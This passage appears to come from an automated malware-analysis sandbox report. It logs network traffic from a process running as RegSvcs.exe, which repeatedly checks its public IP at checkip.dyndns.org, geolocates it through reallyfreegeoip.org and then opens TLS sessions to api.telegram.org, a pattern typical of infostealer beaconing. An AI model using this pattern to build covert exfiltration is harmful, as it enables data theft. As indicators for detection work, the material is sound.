Dec 17, 2024 09:41:50.572268009 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:51.940737963 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:51.940875053 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:51.943670034 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:51.943680048 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:51.943979979 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:51.945462942 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:51.987337112 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:52.450969934 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:52.451040983 CET	443	49725	149.154.167.220	192.168.2.8
Dec 17, 2024 09:41:52.451114893 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:41:52.455687046 CET	49725	443	192.168.2.8	149.154.167.220
Dec 17, 2024 09:42:06.917622089 CET	49711	80	192.168.2.8	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 09:41:23.202919960 CET	52828	53	192.168.2.8	1.1.1.1
Dec 17, 2024 09:41:23.340832949 CET	53	52828	1.1.1.1	192.168.2.8
Dec 17, 2024 09:41:25.109612942 CET	61895	53	192.168.2.8	1.1.1.1
Dec 17, 2024 09:41:25.250757933 CET	53	61895	1.1.1.1	192.168.2.8
Dec 17, 2024 09:41:50.431282997 CET	59150	53	192.168.2.8	1.1.1.1
Dec 17, 2024 09:41:50.570579052 CET	53	59150	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 09:41:23.202919960 CET	192.168.2.8	1.1.1.1	0x7f51	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:25.109612942 CET	192.168.2.8	1.1.1.1	0xab78	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:50.431282997 CET	192.168.2.8	1.1.1.1	0xceea	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:23.340832949 CET	1.1.1.1	192.168.2.8	0x7f51	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:25.250757933 CET	1.1.1.1	192.168.2.8	0xab78	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:25.250757933 CET	1.1.1.1	192.168.2.8	0xab78	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 17, 2024 09:41:50.570579052 CET	1.1.1.1	192.168.2.8	0xceea	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:23.468189955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:24.670916080 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 11966b0dabec349e156c14d0f0f593f5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 09:41:24.690713882 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 09:41:25.065179110 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7fabb89f61b0522b3e409e8637bdc2be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 09:41:27.093934059 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 09:41:27.467632055 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 005cfa9d927094e9d6f95b12943d7e18 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:29.271258116 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 09:41:30.483529091 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7ea10eb22c483368f36a760eb7efd256 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49711	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:32.267570972 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 09:41:33.471648932 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 82544f03955eb2c79718c7f2b2950adc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49714	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:35.255482912 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:36.461808920 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ad9f471c236238dec879848700ae7054 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49717	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:38.477087021 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:39.690244913 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6749ffea5d5cbf480817d6e772cde86c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49719	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:41.472887993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:42.676666975 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e777e81f7ceb9fc483c6d575d52ae65b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49721	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:44.462203026 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:45.675975084 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: abcca6ed863fea13439073c5c93eac28 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49723	158.101.44.242	80	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 09:41:47.505641937 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 09:41:48.710066080 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 793f284e303d1a10f15a509a762c8591 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 08:41:27 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413655 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XdQNpcpBG690rQk4VjUilw4v%2BBPOK70FPlCV%2FZsOso53Q0xJTIsfvwjvPNkBpq1zCJVjpxqSBLNg4b3AigutuE7sNqga%2FoeZJkZikmXZNxjPX56Y%2BEW08O%2BHT9h8w5qky735Z82"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d363e51425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1581&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1846932&cwnd=193&unsent_bytes=0&cid=4e4fc929613f3c6a&ts=460&x=0"
2024-12-17 08:41:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 08:41:29 UTC	882	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413657 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aPTmtCB0o%2B%2B37Dvr2wY2ZY3wK3LpcN3qm9Qtk50or1Ran%2B8%2BsPu6LUpT33Wzq8xCY%2FpC82RkBYUySfUADaMqiY1R3v5pd6AYszqICqBsZ%2FKNq95AW7WRc234XNTB3sWV3NDQW1dJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d441c466a5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1554&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1785932&cwnd=187&unsent_bytes=0&cid=79a8a021d18d4481&ts=450&x=0"
2024-12-17 08:41:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 08:41:32 UTC	872	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413660 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouHY%2BMQsyva4RSAJWQz527FedhCXLvxBUA7TLicxN0Czf4bLrTc1yyLAjU05oK7lUAwrw7O3qLE6eS1VG5xfBPZ7G50mTaYxvBOXxhsKABwBrAGB2eau5LmvgazVauZrdlR6pCaD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d56d886c425-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1525&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1914754&cwnd=240&unsent_bytes=0&cid=5495ff281b622adb&ts=450&x=0"
2024-12-17 08:41:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 08:41:35 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 08:41:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 413663 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2pfO6wAJrzeXG0ectusGobBeVc%2FfSZfWsDMjUe37m6MrFvmAP0jZy47VO2FLJGhFws%2BE%2BjcidRMO5xZ9S2naO7rLkZ3xQGUvvUR2fWA2R8qnnSOBglwbAdHfzaQ%2BuLKN3NlEsoj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f359d698b174378-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1785932&cwnd=235&unsent_bytes=0&cid=d1c52dc1b53febec&ts=449&x=0"
2024-12-17 08:41:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49716	104.21.67.152	443	7960	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 08:41:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
